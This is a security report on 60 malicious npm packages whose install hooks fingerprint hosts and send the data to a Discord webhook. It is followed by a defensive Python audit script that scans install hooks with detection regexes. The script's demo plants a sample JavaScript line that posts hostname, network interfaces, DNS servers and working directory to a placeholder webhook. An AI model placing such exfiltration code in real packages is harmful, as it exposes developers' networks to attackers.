Over the past two weeks, unknown cybercriminals have published 60 malicious packages under three npm accounts: bbbb335656, cdsfdfafd1232436437, and sdsds656565. Each of these accounts published 20 packages containing a short script activated upon installation. The script collects hostnames, IP addresses, DNS server lists, and directory paths and subsequently transmits this information to a Discord webhook under the attackers’ control.
The script targets Windows, Linux, and macOS users; it uses basic sandbox‑evasion checks and fingerprints any system interacting with a malicious package. All packages contain the same data collection code and send the stolen information to the same Discord webhook.

“Combined downloads now exceed 3,000, giving the threat actor a growing map of developer and enterprise networks that can guide future intrusions. As of this writing, all packages remain live on npm. We have petitioned for their removal.” — Socket
The script collects both internal and external network identifiers, which enables the attackers to link private developer environments to their public‑facing infrastructure.
“The script gathers enough information to connect an organization’s internal network to its outward‑facing presence. By harvesting internal and external IP addresses, DNS servers, usernames, and project paths, it enables a threat actor to chart the network and identify high‑value targets for future campaigns.” — Socket
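The behaviour described above lives in an npm install hook: a lifecycle script that fingerprints the host and posts the result to a Discord webhook. The following added audit script is not part of Socket's report or of any npm tooling; it walks a `node_modules` tree, looks at `preinstall`/`install`/`postinstall` hooks and the local scripts they invoke, and flags any that combine host-identity APIs with a Discord webhook URL. The indicator regexes and the `sample-bad`/`sample-ok` packages are constructed assumptions for illustration, not the real packages.

```python
import json
import re
import tempfile
from pathlib import Path

HOOKS = ("preinstall", "install", "postinstall")
# Indicator regexes are assumptions about typical API use; tune them for your codebase.
INDICATORS = {
    "discord_webhook": re.compile(r"discord(?:app)?\.com/api/webhooks/", re.I),
    "hostname": re.compile(r"os\.hostname\s*\("),
    "network_interfaces": re.compile(r"os\.networkInterfaces\s*\("),
    "dns_servers": re.compile(r"dns\.getServers\s*\("),
    "cwd_or_dirname": re.compile(r"process\.cwd\s*\(|__dirname"),
}
SCRIPT_REF = re.compile(r"\b(?:node|bash|sh|python3?)\s+([\w./\\-]+)")

def audit_node_modules(root):
    """Walk every package.json under root; one finding per suspicious install hook."""
    findings = []
    for manifest in Path(root).rglob("package.json"):
        try:
            pkg = json.loads(manifest.read_text(errors="replace"))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip it, keep auditing
        scripts = pkg.get("scripts") if isinstance(pkg, dict) else None
        for hook, cmd in (scripts or {}).items():
            if hook not in HOOKS or not isinstance(cmd, str):
                continue
            src = cmd  # scan the command itself plus any local script it invokes
            for ref in SCRIPT_REF.findall(cmd):
                if (manifest.parent / ref).is_file():
                    src += "\n" + (manifest.parent / ref).read_text(errors="replace")
            hits = sorted(n for n, rx in INDICATORS.items() if rx.search(src))
            if hits:  # install hook that also fingerprints the host or phones home
                findings.append({"package": pkg.get("name"), "hook": hook, "indicators": hits})
    return findings

def demo():
    """Audit a constructed node_modules tree (sample data, not real packages)."""
    root = Path(tempfile.mkdtemp())
    samples = {"sample-bad": ("const os=require('os'),dns=require('dns');fetch('https://discord.com/api/webhooks/0/PLACEHOLDER',"
                              "{method:'POST',body:JSON.stringify([os.hostname(),os.networkInterfaces(),dns.getServers(),process.cwd()])});"),
               "sample-ok": "console.log('building');"}
    for name, script in samples.items():
        pkg = root / "node_modules" / name
        pkg.mkdir(parents=True)
        (pkg / "package.json").write_text(json.dumps({"name": name, "scripts": {"postinstall": "node index.js"}}))
        (pkg / "index.js").write_text(script)
    return audit_node_modules(root)
```

Run `audit_node_modules("path/to/project")` against a real checkout; a hook that only builds (like `sample-ok`) produces no finding, while one that reads host identity and references a webhook is reported with the matched indicators.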